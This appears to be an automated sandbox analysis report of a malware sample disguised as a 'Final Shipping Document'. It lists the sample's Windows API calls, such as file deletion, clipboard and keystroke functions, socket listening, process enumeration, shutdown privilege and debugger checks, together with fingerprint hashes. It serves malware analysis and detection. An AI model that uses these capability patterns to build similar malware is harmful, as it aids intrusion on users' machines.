                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 1946585618-1173974218
                                                            • Opcode ID: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                            • Instruction ID: 0334b646f60fef2b8c44047477ce6e5d8109348afdacb6ffa31594f4d0c9262b
                                                            • Opcode Fuzzy Hash: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                            • Instruction Fuzzy Hash: A5617D3180511DABCF05EBE0DA92AEEB7B5AF15340F2481A5E41277192EB31AF09DB60
                                                            APIs
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                            • Instruction ID: ffd54b4d2ac901481512ea035174049497cab296731831480a714cf788bd424d
                                                            • Opcode Fuzzy Hash: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                            • Instruction Fuzzy Hash: 8641AE35204611AFD310DF25E889F5ABBE1EF45318F14C099E829DB762C775ED81CB90
                                                            APIs
                                                              • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                              • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                              • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00C0E932
                                                            Strings
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $ $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-3163812486
                                                            • Opcode ID: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                            • Instruction ID: c262a52c2d43bc4bc42ab4f7b63ba2e8442ba4500bd0f2b96c9f6b6112d6dd7f
                                                            • Opcode Fuzzy Hash: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                            • Instruction Fuzzy Hash: 1601D673660211ABEB6426B59CC6BFF725CA714750F194D21FD13F21D1D5A15D40D290
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C21276
                                                            • WSAGetLastError.WSOCK32 ref: 00C21283
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C212BA
                                                            • WSAGetLastError.WSOCK32 ref: 00C212C5
                                                            • closesocket.WSOCK32(00000000), ref: 00C212F4
                                                            • listen.WSOCK32(00000000,00000005), ref: 00C21303
                                                            • WSAGetLastError.WSOCK32 ref: 00C2130D
                                                            • closesocket.WSOCK32(00000000), ref: 00C2133C
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            • Opcode ID: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                            • Instruction ID: 536b84b721ad27afb6754a906927f4b7fba6d45d070044ef0fb0e434ac1d3677
                                                            • Opcode Fuzzy Hash: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                            • Instruction Fuzzy Hash: 71418031A00110DFD710DF24D494B2ABBE6AF56318F188198E8669F6E3C771EE81CBE1
                                                            APIs
                                                            • _free.LIBCMT ref: 00BDB9D4
                                                            • _free.LIBCMT ref: 00BDB9F8
                                                            • _free.LIBCMT ref: 00BDBB7F
                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                            • _free.LIBCMT ref: 00BDBD4B
                                                            Similarity
                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                            • String ID:
                                                            • API String ID: 314583886-0
                                                            • Opcode ID: 491eab281eacad6c0ebf39fcd223cb6bd68e2c13012154d9ada7fa51c55a912b
                                                            • Instruction ID: 1cc9f0df43921ccba9589d5f0ba043ad375cb00469ae1b93c480fb39d9fd963f
                                                            • Opcode Fuzzy Hash: 491eab281eacad6c0ebf39fcd223cb6bd68e2c13012154d9ada7fa51c55a912b
                                                            • Instruction Fuzzy Hash: 0EC11375A04245EFCB249F698851FAEFBE8EF41360F1A41EBE89497352FB308E419750
                                                            APIs
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                              • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C0D420
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D470
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D481
                                                            • FindClose.KERNEL32(00000000), ref: 00C0D498
                                                            • FindClose.KERNEL32(00000000), ref: 00C0D4A1
                                                            Strings
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                            • Instruction ID: d026d12556c35a264308cfb25204968efa8b8961bb9e80d884920b7757929493
                                                            • Opcode Fuzzy Hash: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                            • Instruction Fuzzy Hash: 97317A7101C3419BC300EFA4D8919AFB7E8AE92340F444A5DF4E293191EB34AA09DB63
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                            • Instruction ID: 8884a215ee60958b4e5e4632c6faf76e1395321a925096e4abbc434c245a4816
                                                            • Opcode Fuzzy Hash: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                            • Instruction Fuzzy Hash: 9CC22771E086298BDB25DE289D807EAB7F5EB48305F1441EBD85EE7340E775AE818F40
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C164DC
                                                            • CoInitialize.OLE32(00000000), ref: 00C16639
                                                            • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C16650
                                                            • CoUninitialize.OLE32 ref: 00C168D4
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                            • Instruction ID: 16ff351823bc8b19979b4bf50c8659a57a2642ab7f2deb26f138635589f7083d
                                                            • Opcode Fuzzy Hash: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                            • Instruction Fuzzy Hash: 13D15971508201AFC314EF24C881EABB7E9FF96704F00496DF5958B291EB71EA49CB92
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00C222E8
                                                              • Part of subcall function 00C1E4EC: GetWindowRect.USER32(?,?), ref: 00C1E504
                                                            • GetDesktopWindow.USER32 ref: 00C22312
                                                            • GetWindowRect.USER32(00000000), ref: 00C22319
                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C22355
                                                            • GetCursorPos.USER32(?), ref: 00C22381
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C223DF
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                            • String ID:
                                                            • API String ID: 2387181109-0
                                                            • Opcode ID: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                            • Instruction ID: 2cde447ff8172e4ccfb51f25541d0be105b92defe26ff5ac4c5b29196bc6b696
                                                            • Opcode Fuzzy Hash: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                            • Instruction Fuzzy Hash: 3A31AD72504325ABD720DF55D849B9FBBADFF88314F000A19F995A7191DB34EA08CB92
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C19B78
                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C19C8B
                                                              • Part of subcall function 00C13874: GetInputState.USER32 ref: 00C138CB
                                                              • Part of subcall function 00C13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C19BA8
                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C19C75
                                                            Strings
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                            • String ID: *.*
                                                            • API String ID: 1972594611-438819550
                                                            • Opcode ID: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                            • Instruction ID: 485559d7c1ee7fa79e2b5c560bf51a9c4e1cdbcae70e6b8ec142272f5e4cf491
                                                            • Opcode Fuzzy Hash: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                            • Instruction Fuzzy Hash: 8341717190420A9FCF14DF64C8A5AEEBBF8EF06310F144095E855A2191EB309F95DFA0
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BB9A4E
                                                            • GetSysColor.USER32(0000000F), ref: 00BB9B23
                                                            • SetBkColor.GDI32(?,00000000), ref: 00BB9B36
                                                            Similarity
                                                            • API ID: Color$LongProcWindow
                                                            • String ID:
                                                            • API String ID: 3131106179-0
                                                            • Opcode ID: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                            • Instruction ID: 08d8552b83f8e61b78d8ddf24e6a9fdc02ec759dc16b86ca96e40d021371e809
                                                            • Opcode Fuzzy Hash: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                            • Instruction Fuzzy Hash: 50A1E070258408AFE728AA2D8C99EFF3ADDDB42340F2502C9F702D7691CEA59D45D372
APIs
  • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
  • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C2185D
• WSAGetLastError.WSOCK32 ref: 00C21884
• bind.WSOCK32(00000000,?,00000010), ref: 00C218DB
• WSAGetLastError.WSOCK32 ref: 00C218E6
• closesocket.WSOCK32(00000000), ref: 00C21915
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
• Instruction ID: 712dd442b65726a4c945c9e307d6d740e0618342f939140220bda0123638a11c
• Opcode Fuzzy Hash: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
• Instruction Fuzzy Hash: B951A271A00210AFDB10AF24D8C6F7A77E5AB45718F188498F919AF3D3C771AE418BA1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: d667df46e637cb186ec914b50dab156a34e09b62efae333e7a2730fcc938a4b6
• Instruction ID: 10d79cdddc158dba5b9c975eed536a1750d5971dd85e98118e2dc00e6ac93b62
• Opcode Fuzzy Hash: d667df46e637cb186ec914b50dab156a34e09b62efae333e7a2730fcc938a4b6
• Instruction Fuzzy Hash: F421E0317602109FD7218F2AE894B6A7BE5EF85324F1C9068EC4ADB351CB71ED42CB90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
• Instruction ID: 0c89df2cd3f0ddf86cef32e174edf15bc2bbc42347eb5b88d696b2c5b3437c06
• Opcode Fuzzy Hash: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
• Instruction Fuzzy Hash: 69A26C70E0465ACBDF24CF59C8807AEB7F1FB55314F2481EAE816A7685EB709D81CB90
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00C2A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 00C2A6BA
  • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
• Process32NextW.KERNEL32(00000000,?), ref: 00C2A79C
• CloseHandle.KERNEL32(00000000), ref: 00C2A7AB
  • Part of subcall function 00BBCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00BE3303,?), ref: 00BBCE8A
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
• Instruction ID: ac7b8419a7969f7121177d5dc921350dff8c6ea5c293e1fcc21d47ae928e4da3
• Opcode Fuzzy Hash: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
• Instruction Fuzzy Hash: 0E514DB1508310AFD710EF24D886A6FBBE8FF89754F00896DF59997291EB70D904CB92
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C0AAAC
• SetKeyboardState.USER32(00000080), ref: 00C0AAC8
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C0AB36
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C0AB88
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
• Instruction ID: fa06a0c98f7a387f8dbe845c1992b259a44244ed40f6b16a6da25a71f0cad8ae
• Opcode Fuzzy Hash: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
• Instruction Fuzzy Hash: 9E312671A44318AFFF35CB69CC05BFE7BAAAB44310F04421AF1A1961D1D374CA81D762
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 00C1CE89
• GetLastError.KERNEL32(?,00000000), ref: 00C1CEEA
• SetEvent.KERNEL32(?,?,00000000), ref: 00C1CEFE
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
• Opcode ID: 07a871bbe4cc84a7c4c20c0dda3fb8ba2be76bf5a7800e72469a7600c3d54b23
• Instruction ID: 9ad6af8b2ec6e750906179d109e76193ed34f8cf9f1c5cec5caa798177baaaf1
• Opcode Fuzzy Hash: 07a871bbe4cc84a7c4c20c0dda3fb8ba2be76bf5a7800e72469a7600c3d54b23
• Instruction Fuzzy Hash: EC21BD71540305ABDB30CFA5C988BABB7F8EF11314F10442EF566A2151E774EE85AB90
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C082AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 1d5efb23e3ce66718bf6599e1137eda89f7d1b72f259f9a5eb42628f7edcd46f
• Instruction ID: 90b2ff4b3c162037edc6d9cc102aeb13c5c39479eccdf38abc9db09c3c88d1bb
• Opcode Fuzzy Hash: 1d5efb23e3ce66718bf6599e1137eda89f7d1b72f259f9a5eb42628f7edcd46f
• Instruction Fuzzy Hash: 09322574A007059FCB28CF59C481A6AB7F1FF48710B15C56EE5AADB3A1EB70E941CB44
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00C15CC1
• FindNextFileW.KERNEL32(00000000,?), ref: 00C15D17
• FindClose.KERNEL32(?), ref: 00C15D5F
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
• Instruction ID: 1c046a8a2bdf3da15263f5a339b286da1e62886ac0369e59f815134953d55f5c
• Opcode Fuzzy Hash: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
• Instruction Fuzzy Hash: A951AA74604601DFC714DF28D494E9AB7E4FF8A314F14859DE96A8B3A1CB30ED44CB91
APIs
• IsDebuggerPresent.KERNEL32 ref: 00BD271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD2724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00BD2731
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
• Instruction ID: 860fe1091a5170ceca49bf5c4ddaa63c5cd0b47585db6e2913d739b6ca33a9a9
• Opcode Fuzzy Hash: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
• Instruction Fuzzy Hash: AE31C375911218ABCB21DF64D888B9DBBF8AF18310F5041EAE81CA6260E7349F818F44
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C151DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C15238
• SetErrorMode.KERNEL32(00000000), ref: 00C152A1
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
• Instruction ID: ecea70beacaaa79f7df76143a708c9f9be3731f2a383d412937c24a950147f80
• Opcode Fuzzy Hash: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
• Instruction Fuzzy Hash: B8310975A10518DFDB00DF54D884BADBBB4FF49314F048099E805AB2A2DB32E956DB90
APIs
  • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
  • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
• GetLastError.KERNEL32 ref: 00C0174A
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
• Instruction ID: 55c46544654ab315dcf84bd73a3fbce8df2d2fbc46b906f222ddf6ba6cd26f5a
• Opcode Fuzzy Hash: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
• Instruction Fuzzy Hash: 1611BCB2414205AFD718AF54DCC6EBEB7F9EB04714B24852EE46652281EBB0BC41CB20
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C0D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C0D645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C0D650
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
